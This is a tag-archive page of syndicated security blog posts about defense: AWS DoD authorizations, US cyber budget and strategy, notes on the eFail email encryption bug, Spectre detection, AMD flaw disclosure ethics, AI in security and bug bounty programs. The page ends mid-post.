Tag Archives: defense

10 additional AWS services authorized at DoD Impact Level 6 for the AWS Secret Region

Post Syndicated from Tyler Harding original https://aws.amazon.com/blogs/security/10-additional-aws-services-authorized-dod-impact-level-6-for-aws-secret-region/

The Defense Information Systems Agency (DISA) has authorized 10 additional AWS services in the AWS Secret Region for production workloads at the Department of Defense (DoD) Impact Level (IL) 6 under the DoD’s Cloud Computing Security Requirements Guide (DoD CC SRG). With this authorization at DoD IL 6, DoD Mission Owners can process classified and mission critical workloads for National Security Systems in the AWS Secret Region. The AWS Secret Region is available to the Department of Defense on the AWS’s GSA IT Multiple Award Schedule.

AWS successfully completed an independent evaluation by members of the Intelligence Community (IC) that confirmed AWS effectively implemented 859 security controls using applicable criteria from NIST SP 800-53 Rev 4, the DoD CC SRG, and the Committee on National Security Systems Instruction No. 1253 at the Moderate Confidentiality, Moderate Integrity, and Moderate Availability impact levels.

The 10 AWS services newly authorized by DISA at IL 6 provide additional choices for DoD Mission Owners to use the capabilities of the AWS Cloud in service areas such as compute and storage, management and developer tools, analytics, and networking. With the addition of these 10 newly authorized AWS services (listed with links below), AWS expands the capabilities for DoD Mission Owners to use a total of 36 services and features.

Compute and Storage:

Management and Developer Tools:

  • AWS Personal Health Dashboard: Monitor, manage, and optimize your AWS environment with a personalized view into the performance and availability of the AWS services underlying your AWS resources.
  • AWS Systems Manager: Automatically collect software inventory, apply OS patches, create system images, configure Windows and Linux operating systems, and seamlessly bridge your existing infrastructure with AWS.
  • AWS CodeDeploy: A fully managed deployment service that automates software deployments to a variety of compute services such as Amazon EC2, AWS Lambda, and on-premises servers.

Analytics:

  • AWS Data Pipeline: Reliably process and move data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.

Networking:

  • AWS PrivateLink: Use secure private connectivity between Amazon Virtual Private Cloud (Amazon VPC), AWS services, and on-premises applications on the AWS network, and eliminate the exposure of data to the public internet.
  • AWS Transit Gateway: Easily connect Amazon VPC, AWS accounts, and on-premises networks to a single gateway.
Figure 1: 10 additional AWS services authorized at DoD Impact Level 6

Figure 1: 10 additional AWS services authorized at DoD Impact Level 6

Newly authorized AWS services and features at DoD Impact Level 6

  1. Amazon Elastic Container Registry (ECR)
  2. Amazon Elastic Container Service (ECS)
  3. AWS CodeDeploy
  4. AWS Data Pipeline
  5. AWS Lambda
  6. AWS Personal Health Dashboard
  7. AWS PrivateLink
  8. AWS Snowball Edge
  9. AWS Systems Manager
  10. AWS Transit Gateway

Existing authorized AWS services and features at DoD Impact Level 6

  1. Amazon CloudWatch
  2. Amazon DynamoDB (DDB)
  3. Amazon Elastic Block Store (EBS)
  4. Amazon Elastic Compute Cloud (EC2)
  5. Amazon Elastic Compute Cloud (EC2) – Auto Scaling
  6. Amazon Elastic Compute Cloud (EC2) – Elastic Load Balancing (ELB) (Classic and Application Load Balancer)
  7. Amazon ElastiCache
  8. Amazon Kinesis Data Streams
  9. Amazon Redshift
  10. Amazon S3 Glacier
  11. Amazon Simple Notification Service (SNS)
  12. Amazon Simple Queue Service (SQS)
  13. Amazon Simple Storage Service (S3)
  14. Amazon Simple Workflow (SWF)
  15. Amazon Virtual Private Cloud (VPC)
  16. AWS CloudFormation
  17. AWS CloudTrail
  18. AWS Config
  19. AWS Database Migration Service (DMS)
  20. AWS Direct Connect (Dx)
  21. AWS Identity and Access Management (IAM)
  22. AWS Key Management Service (KMS)
  23. Amazon Relational Database Service (RDS) (including MariaDB, MySQL, Oracle, Postgres, and SQL Server)
  24. AWS Snowball
  25. AWS Step Functions
  26. AWS Trusted Advisor

To learn more about AWS solutions for DoD, please see our AWS solution offerings. Follow the AWS Security Blog for future updates on our Services in Scope by Compliance Program page. If you have feedback about this post, let us know in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Tyler Harding

Tyler is the DoD Compliance Program Manager within AWS Security Assurance. He has over 20 years of experience providing information security solutions to federal civilian, DoD, and intelligence agencies.

Examining the US Cyber Budget

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/examining_the_u.html

Jason Healey takes a detailed look at the US federal cybersecurity budget and reaches an important conclusion: the US keeps saying that we need to prioritize defense, but in fact we prioritize attack.

To its credit, this budget does reveal an overall growth in cybersecurity funding of about 5 percent above the fiscal 2019 estimate. However, federal cybersecurity spending on civilian departments like the departments of Homeland Security, State, Treasury and Justice is overshadowed by that going toward the military:

  • The Defense Department’s cyber-related budget is nearly 25 percent higher than the total going to all civilian departments, including the departments of Homeland Security, Treasury and Energy, which not only have to defend their own critical systems but also partner with critical infrastructure to help secure the energy, finance, transportation and health sectors ($9.6 billion compared to $7.8 billion).
  • The funds to support just the headquarters element­ — that is, not even the operational teams in facilities outside of headquarters — ­of U.S. Cyber Command are 33 percent higher than all the cyber-related funding to the State Department ($532 million compared to $400 million).

  • Just the increased funding to Defense was 30 percent higher than the total Homeland Security budget to improve the security of federal networks ($909 million compared to $694.1 million).

  • The Defense Department is budgeted two and a half times as much just for cyber operations as the Cybersecurity and Infrastructure Security Agency (CISA), which is nominally in charge of cybersecurity ($3.7 billion compared to $1.47 billion). In fact, the cyber operations budget is higher than the budgets for the CISA, the FBI and the Department of Justice’s National Security Division combined ($3.7 billion compared to $2.21 billion).

  • The Defense Department’s cyber operations have nearly 10 times the funding as the relevant Homeland Security defensive operational element, the National Cybersecurity and Communications Integration Center (NCCIC) ($3.7 billion compared to $371.4 million).

  • The U.S. government budgeted as much on military construction for cyber units as it did for the entirety of Homeland Security ($1.9 billion for each).

We cannot ignore what the money is telling us. The White House and National Cyber Strategy emphasize the need to protect the American people and our way of life, yet the budget does not reflect those values. Rather, the budget clearly shows that the Defense Department is the government’s main priority. Of course, the exact Defense numbers for how much is spent on offense are classified.

The US National Cyber Strategy

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/10/the_us_national.html

Last month, the White House released the “National Cyber Strategy of the United States of America. I generally don’t have much to say about these sorts of documents. They’re filled with broad generalities. Who can argue with:

Defend the homeland by protecting networks, systems, functions, and data;

Promote American prosperity by nurturing a secure, thriving digital economy and fostering strong domestic innovation;

Preserve peace and security by strengthening the ability of the United States in concert with allies and partners ­ to deter and, if necessary, punish those who use cyber tools for malicious purposes; and

Expand American influence abroad to extend the key tenets of an open, interoperable, reliable, and secure Internet.

The devil is in the details, of course. And the strategy includes no details.

In a New York Times op-ed, Josephine Wolff argues that this new strategy, together with the more-detailed Department of Defense cyber strategy and the classified National Security Presidential Memorandum 13, represent a dangerous shift of US cybersecurity posture from defensive to offensive:

…the National Cyber Strategy represents an abrupt and reckless shift in how the United States government engages with adversaries online. Instead of continuing to focus on strengthening defensive technologies and minimizing the impact of security breaches, the Trump administration plans to ramp up offensive cyberoperations. The new goal: deter adversaries through pre-emptive cyberattacks and make other nations fear our retaliatory powers.

[…]

The Trump administration’s shift to an offensive approach is designed to escalate cyber conflicts, and that escalation could be dangerous. Not only will it detract resources and attention from the more pressing issues of defense and risk management, but it will also encourage the government to act recklessly in directing cyberattacks at targets before they can be certain of who those targets are and what they are doing.

[…]

There is no evidence that pre-emptive cyberattacks will serve as effective deterrents to our adversaries in cyberspace. In fact, every time a country has initiated an unprompted cyberattack, it has invariably led to more conflict and has encouraged retaliatory breaches rather than deterring them. Nearly every major publicly known online intrusion that Russia or North Korea has perpetrated against the United States has had significant and unpleasant consequences.

Wolff is right; this is reckless. In Click Here to Kill Everybody, I argue for a “defense dominant” strategy: that while offense is essential for defense, when the two are in conflict, it should take a back seat to defense. It’s more complicated than that, of course, and I devote a whole chapter to its implications. But as computers and the Internet become more critical to our lives and society, keeping them secure becomes more important than using them to attack others.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don’t even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:

The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn’t matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommend disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quotes in front of the URL but no ending quotes. The ending will in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enignmail) will detect this and automatically decrypt it. In this case, it’s some previous email message I’ve received the attacker captured by eavesdropping, who then pastes the contents into this email message in order to get it decrypted.

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens. Instead, I get this:

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the PGP decrypted message. Instead what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds it’s own HTML tags consisting of lines between each part. In the email client it looks like this:

The HTML code it adds looks like:

That’s what you see in the above URL, all this code up to the first quotes. Those quotes terminate the quotes in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though, this is only according to my tests, there may be a work around to this that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via “STARTTLS”, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.
Some organizations don’t care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won’t actively intercept STARTTLS messages, for fear of getting caught.
The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn’t necessarily that you’ll only get one decrypted.
As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if its so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.
Somebody ought to write a plugin to Thunderbird to detect this.

Summary

It only works if attackers have already captured your emails (though, that’s why you use PGP/SMIME in the first place, to guard against that).
It only works if you’ve enabled your email client to automatically grab external/remote content.
It seems to not be easily reproducible in all cases.
Instead of disabling PGP/SMIME, you should make sure your email client hast remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad:

How AWS Meets a Physical Separation Requirement with a Logical Separation Approach

Post Syndicated from Min Hyun original https://aws.amazon.com/blogs/security/how-aws-meets-a-physical-separation-requirement-with-a-logical-separation-approach/

We have a new resource available to help you meet a requirement for physically-separated infrastructure using logical separation in the AWS cloud. Our latest guide, Logical Separation: An Evaluation of the U.S. Department of Defense Cloud Security Requirements for Sensitive Workloads outlines how AWS meets the U.S. Department of Defense’s (DoD) stringent physical separation requirement by pioneering a three-pronged logical separation approach that leverages virtualization, encryption, and deploying compute to dedicated hardware.

This guide will help you understand logical separation in the cloud and demonstrates its advantages over a traditional physical separation model. Embracing this approach can help organizations confidently meet or exceed security requirements found in traditional on-premises environments, while also providing increased security control and flexibility.

Logical Separation is the second guide in the AWS Government Handbook Series, which examines cybersecurity policy initiatives and identifies best practices.

If you have questions or want to learn more, contact your account executive or AWS Support.

NIST Issues Call for "Lightweight Cryptography" Algorithms

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/nist_issues_cal.html

This is interesting:

Creating these defenses is the goal of NIST’s lightweight cryptography initiative, which aims to develop cryptographic algorithm standards that can work within the confines of a simple electronic device. Many of the sensors, actuators and other micromachines that will function as eyes, ears and hands in IoT networks will work on scant electrical power and use circuitry far more limited than the chips found in even the simplest cell phone. Similar small electronics exist in the keyless entry fobs to newer-model cars and the Radio Frequency Identification (RFID) tags used to locate boxes in vast warehouses.

All of these gadgets are inexpensive to make and will fit nearly anywhere, but common encryption methods may demand more electronic resources than they possess.

The NSA’s SIMON and SPECK would certainly qualify.

[$] A successful defense against a copyright troll

Post Syndicated from jake original https://lwn.net/Articles/752485/rss

At the 2018 Legal and
Licensing Workshop
(LLW), which is a yearly gathering
of lawyers and technical folks organized by the Free Software Foundation
Europe (FSFE), attendees got more details on a recent hearing in a German GPL
enforcement case. Marcus von Welser is a lawyer who represented the
defendant, Geniatech,
in a case that was brought by Patrick
McHardy
. In the presentation, von
Welser was joined by
Armijn Hemel, who helped
Geniatech in its compliance efforts. The hearing
was of interest for a number of reasons, not least because McHardy
withdrew his request for an injunction once it became clear that the judge
was leaning in
favor of the defendants
—effectively stopping this case dead in its tracks.

OMG The Stupid It Burns

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/04/omg-stupid-it-burns.html

This article, pointed out by @TheGrugq, is stupid enough that it’s worth rebutting.

The article starts with the question “Why did the lessons of Stuxnet, Wannacry, Heartbleed and Shamoon go unheeded?“. It then proceeds to ignore the lessons of those things.
Some of the actual lessons should be things like how Stuxnet crossed air gaps, how Wannacry spread through flat Windows networking, how Heartbleed comes from technical debt, and how Shamoon furthers state aims by causing damage.
But this article doesn’t cover the technical lessons. Instead, it thinks the lesson should be the moral lesson, that we should take these things more seriously. But that’s stupid. It’s the sort of lesson people teach you that know nothing about the topic. When you have nothing of value to contribute to a topic you can always take the moral high road and criticize everyone for being morally weak for not taking it more seriously. Obviously, since doctors haven’t cured cancer yet, it’s because they don’t take the problem seriously.
The article continues to ignore the lesson of these cyber attacks and instead regales us with a list of military lessons from WW I and WW II. This makes the same flaw that many in the military make, trying to understand cyber through analogies with the real world. It’s not that such lessons could have no value, it’s that this article contains a poor list of them. It seems to consist of a random list of events that appeal to the author rather than events that have bearing on cybersecurity.
Then, in case we don’t get the point, the article bullies us with hyperbole, cliches, buzzwords, bombastic language, famous quotes, and citations. It’s hard to see how most of them actually apply to the text. Rather, it seems like they are included simply because he really really likes them.
The article invests much effort in discussing the buzzword “OODA loop”. Most attacks in cyberspace don’t have one. Instead, attackers flail around, trying lots of random things, overcoming defense with brute-force rather than an understanding of what’s going on. That’s obviously the case with Wannacry: it was an accident, with the perpetrator experimenting with what would happen if they added the ETERNALBLUE exploit to their existing ransomware code. The consequence was beyond anybody’s ability to predict.
You might claim that this is just the first stage, that they’ll loop around, observe Wannacry’s effects, orient themselves, decide, then act upon what they learned. Nope. Wannacry burned the exploit. It’s essentially removed any vulnerable systems from the public Internet, thereby making it impossible to use what they learned. It’s still active a year later, with infected systems behind firewalls busily scanning the Internet so that if you put a new system online that’s vulnerable, it’ll be taken offline within a few hours, before any other evildoer can take advantage of it.
See what I’m doing here? Learning the actual lessons of things like Wannacry? The thing the above article fails to do??
The article has a humorous paragraph on “defense in depth”, misunderstanding the term. To be fair, it’s the cybersecurity industry’s fault: they adopted then redefined the term. That’s why there’s two separate articles on Wikipedia: one for the old military term (as used in this article) and one for the new cybersecurity term.
As used in the cybersecurity industry, “defense in depth” means having multiple layers of security. Many organizations put all their defensive efforts on the perimeter, and none inside a network. The idea of “defense in depth” is to put more defenses inside the network. For example, instead of just one firewall at the edge of the network, put firewalls inside the network to segment different subnetworks from each other, so that a ransomware infection in the customer support computers doesn’t spread to sales and marketing computers.
The article talks about exploiting WiFi chips to bypass the defense in depth measures like browser sandboxes. This is conflating different types of attacks. A WiFi attack is usually considered a local attack, from somebody next to you in bar, rather than a remote attack from a server in Russia. Moreover, far from disproving “defense in depth” such WiFi attacks highlight the need for it. Namely, phones need to be designed so that successful exploitation of other microprocessors (namely, the WiFi, Bluetooth, and cellular baseband chips) can’t directly compromise the host system. In other words, once exploited with “Broadpwn”, a hacker would need to extend the exploit chain with another vulnerability in the hosts Broadcom WiFi driver rather than immediately exploiting a DMA attack across PCIe. This suggests that if PCIe is used to interface to peripherals in the phone that an IOMMU be used, for “defense in depth”.
Cybersecurity is a young field. There are lots of useful things that outsider non-techies can teach us. Lessons from military history would be well-received.
But that’s not this story. Instead, this story is by an outsider telling us we don’t know what we are doing, that they do, and then proceeds to prove they don’t know what they are doing. Their argument is based on a moral suasion and bullying us with what appears on the surface to be intellectual rigor, but which is in fact devoid of anything smart.
My fear, here, is that I’m going to be in a meeting where somebody has read this pretentious garbage, explaining to me why “defense in depth” is wrong and how we need to OODA faster. I’d rather nip this in the bud, pointing out if you found anything interesting from that article, you are wrong.

[$] Finding Spectre vulnerabilities with smatch

Post Syndicated from corbet original https://lwn.net/Articles/752408/rss

The furor over the Meltdown and Spectre vulnerabilities has calmed a bit —
for now, at least — but that does not mean that developers have stopped
worrying about them. Spectre variant 1 (the bounds-check bypass
vulnerability) has been of particular concern because, while the kernel is
thought to contain numerous vulnerable spots, nobody really knows how to
find them all. As a result, the defenses that have been developed for
variant 1 have only been deployed in a few places. Recently, though,
Dan Carpenter has enhanced the smatch tool to enable it to find possibly
vulnerable code in the kernel.

Introducing Microsoft Azure Sphere

Post Syndicated from corbet original https://lwn.net/Articles/751994/rss

Microsoft has issued a
press release
describing the security dangers involved with the
Internet of things (“a weaponized stove, baby monitors that spy, the
contents of your refrigerator being held for ransom
“) and introducing
“Microsoft Azure Sphere” as a combination of hardware and software to
address the problem. “Unlike the RTOSes common to MCUs today, our
defense-in-depth IoT OS offers multiple layers of security. It combines
security innovations pioneered in Windows, a security monitor, and a custom
Linux kernel to create a highly-secured software environment and a
trustworthy platform for new IoT experiences.

DARPA Funding in AI-Assisted Cybersecurity

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/04/darpa_funding_i.html

DARPA is launching a program aimed at vulnerability discovery via human-assisted AI. The new DARPA program is called CHESS (Computers and Humans Exploring Software Security), and they’re holding a proposers day in a week and a half.

This is the kind of thing that can dramatically change the offense/defense balance.

New – Encryption of Data in Transit for Amazon EFS

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-encryption-of-data-in-transit-for-amazon-efs/

Amazon Elastic File System was designed to be the file system of choice for cloud-native applications that require shared access to file-based storage. We launched EFS in mid-2016 and have added several important features since then including on-premises access via Direct Connect and encryption of data at rest. We have also made EFS available in additional AWS Regions, most recently US West (Northern California). As was the case with EFS itself, these enhancements were made in response to customer feedback, and reflect our desire to serve an ever-widening customer base.

Encryption in Transit
Today we are making EFS even more useful with the addition of support for encryption of data in transit. When used in conjunction with the existing support for encryption of data at rest, you now have the ability to protect your stored files using a defense-in-depth security strategy.

In order to make it easy for you to implement encryption in transit, we are also releasing an EFS mount helper. The helper (available in source code and RPM form) takes care of setting up a TLS tunnel to EFS, and also allows you to mount file systems by ID. The two features are independent; you can use the helper to mount file systems by ID even if you don’t make use of encryption in transit. The helper also supplies a recommended set of default options to the actual mount command.

Setting up Encryption
I start by installing the EFS mount helper on my Amazon Linux instance:

$ sudo yum install -y amazon-efs-utils

Next, I visit the EFS Console and capture the file system ID:

Then I specify the ID (and the TLS option) to mount the file system:

$ sudo mount -t efs fs-92758f7b -o tls /mnt/efs

And that’s it! The encryption is transparent and has an almost negligible impact on data transfer speed.

Available Now
You can start using encryption in transit today in all AWS Regions where EFS is available.

The mount helper is available for Amazon Linux. If you are running another distribution of Linux you will need to clone the GitHub repo and build your own RPM, as described in the README.

Jeff;

Israeli Security Attacks AMD by Publishing Zero-Day Exploits

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/israeli_securit.html

Last week, the Israeli security company CTS Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names — RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA — and logos we’ve come to expect from these sorts of things. What’s new is that the company only gave AMD a day’s notice, which breaks with every norm about responsible disclosure. CTS Labs didn’t release details of the exploits, only high-level descriptions of the vulnerabilities, but it is probably still enough for others to reproduce their results. This is incredibly irresponsible of the company.

Moreover, the vulnerabilities are kind of meh. Nicholas Weaver explains:

In order to use any of the four vulnerabilities, an attacker must already have almost complete control over the machine. For most purposes, if the attacker already has this access, we would generally say they’ve already won. But these days, modern computers at least attempt to protect against a rogue operating system by having separate secure subprocessors. CTS Labs discovered the vulnerabilities when they looked at AMD’s implementation of the secure subprocessor to see if an attacker, having already taken control of the host operating system, could bypass these last lines of defense.

In a “Clarification,” CTS Labs kind of agrees:

The vulnerabilities described in amdflaws.com could give an attacker that has already gained initial foothold into one or more computers in the enterprise a significant advantage against IT and security teams.

The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine. To clarify misunderstandings — there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin — and they will work (on the affected models as described on the site).

The weirdest thing about this story is that CTS Labs describes one of the vulnerabilities, Chimera, as a backdoor. Although it doesn’t t come out and say that this was deliberately planted by someone, it does make the point that the chips were designed in Taiwan. This is an incredible accusation, and honestly needs more evidence before we can evaluate it.

The upshot of all of this is that CTS Labs played this for maximum publicity: over-hyping its results and minimizing AMD’s ability to respond. And it may have an ulterior motive:

But CTS’s website touting AMD’s flaws also contained a disclaimer that threw some shadows on the company’s motives: “Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn’t respond.

We all need to demand better behavior from security researchers. I know that any publicity is good publicity, but I am pleased to see the stories critical of CTS Labs outnumbering the stories praising it.

EDITED TO ADD (3/21): AMD responds:

AMD’s response today agrees that all four bug families are real and are found in the various components identified by CTS. The company says that it is developing firmware updates for the three PSP flaws. These fixes, to be made available in “coming weeks,” will be installed through system firmware updates. The firmware updates will also mitigate, in some unspecified way, the Chimera issue, with AMD saying that it’s working with ASMedia, the third-party hardware company that developed Promontory for AMD, to develop suitable protections. In its report, CTS wrote that, while one CTS attack vector was a firmware bug (and hence in principle correctable), the other was a hardware flaw. If true, there may be no effective way of solving it.

Response here.

Artificial Intelligence and the Attack/Defense Balance

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/artificial_inte.html

Artificial intelligence technologies have the potential to upend the longstanding advantage that attack has over defense on the Internet. This has to do with the relative strengths and weaknesses of people and computers, how those all interplay in Internet security, and where AI technologies might change things.

You can divide Internet security tasks into two sets: what humans do well and what computers do well. Traditionally, computers excel at speed, scale, and scope. They can launch attacks in milliseconds and infect millions of computers. They can scan computer code to look for particular kinds of vulnerabilities, and data packets to identify particular kinds of attacks.

Humans, conversely, excel at thinking and reasoning. They can look at the data and distinguish a real attack from a false alarm, understand the attack as it’s happening, and respond to it. They can find new sorts of vulnerabilities in systems. Humans are creative and adaptive, and can understand context.

Computers — so far, at least — are bad at what humans do well. They’re not creative or adaptive. They don’t understand context. They can behave irrationally because of those things.

Humans are slow, and get bored at repetitive tasks. They’re terrible at big data analysis. They use cognitive shortcuts, and can only keep a few data points in their head at a time. They can also behave irrationally because of those things.

AI will allow computers to take over Internet security tasks from humans, and then do them faster and at scale. Here are possible AI capabilities:

  • Discovering new vulnerabilities­ — and, more importantly, new types of vulnerabilities­ in systems, both by the offense to exploit and by the defense to patch, and then automatically exploiting or patching them.
  • Reacting and adapting to an adversary’s actions, again both on the offense and defense sides. This includes reasoning about those actions and what they mean in the context of the attack and the environment.
  • Abstracting lessons from individual incidents, generalizing them across systems and networks, and applying those lessons to increase attack and defense effectiveness elsewhere.
  • Identifying strategic and tactical trends from large datasets and using those trends to adapt attack and defense tactics.

That’s an incomplete list. I don’t think anyone can predict what AI technologies will be capable of. But it’s not unreasonable to look at what humans do today and imagine a future where AIs are doing the same things, only at computer speeds, scale, and scope.

Both attack and defense will benefit from AI technologies, but I believe that AI has the capability to tip the scales more toward defense. There will be better offensive and defensive AI techniques. But here’s the thing: defense is currently in a worse position than offense precisely because of the human components. Present-day attacks pit the relative advantages of computers and humans against the relative weaknesses of computers and humans. Computers moving into what are traditionally human areas will rebalance that equation.

Roy Amara famously said that we overestimate the short-term effects of new technologies, but underestimate their long-term effects. AI is notoriously hard to predict, so many of the details I speculate about are likely to be wrong­ — and AI is likely to introduce new asymmetries that we can’t foresee. But AI is the most promising technology I’ve seen for bringing defense up to par with offense. For Internet security, that will change everything.

This essay previously appeared in the March/April 2018 issue of IEEE Security & Privacy.

Welcome Lin – Our Newest Support Tech!

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-lin-newest-support-tech/

As Backblaze continues to grow a couple of our departments need to grow right along with it. One of the quickest-growing departments we have at Backblaze is Customer Support. We do all of our support in-house and the team grows to accommodate our growing customer base! We have a new person joining us in support, Lin! Lets take a moment to learn a bit more about her shall we?

What is your Backblaze Title?
Jr. Support Technician.

Where are you originally from?
Ventura, CA. It’s okay if you haven’t heard of it, it is very, very, small.

What attracted you to Backblaze?
The company culture, the delightful ads on Critical Role, and how immediately genuinely friendly everyone I met was.

Where else have you worked?
I previously did content management at Wish, and an awful lot of temp gigs. I did a few years at a coffee shop in the beginning of college, but my first job ever was a JoAnn’s Fabrics.

Where did you go to school?
San Francisco State University

What’s your dream job?
Magical Girl!

Favorite place you’ve traveled?
Tokyo, but Disneyworld is a real close second.

Favorite hobby?
I spend an awful lot of time playing video games, and possibly even more making silly costumes.

Star Trek or Star Wars?
Truthfully I love both. But I was raised on original series and next generation Trek.

Coke or Pepsi?
Coke … definitely coke.

Favorite food?
Cupcakes. Especially funfetti cupcakes.

Anything else you’d like you’d like to tell us?
I discovered Sailor Moon as a child and it possibly influenced my life way too much. Like many people here I am a huge Disney fan; Anyone who spends longer than a few hours with me will probably tell you I can go on for hours about my cat (but in my defense he’s adorable and fluffy and I have the pictures to prove it).

We keep hiring folks that love Disney! It’s kind of amazing. It’s also nice to have folks in the office that can chat about the latest Critical Role episode! Welcome aboard Lin, we’ll try to get some funfetti stocked for the cupcakes that come in!

The post Welcome Lin – Our Newest Support Tech! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There’s plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What bug bounties don’t offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios for their skills and given the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s a natural to be wary and try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
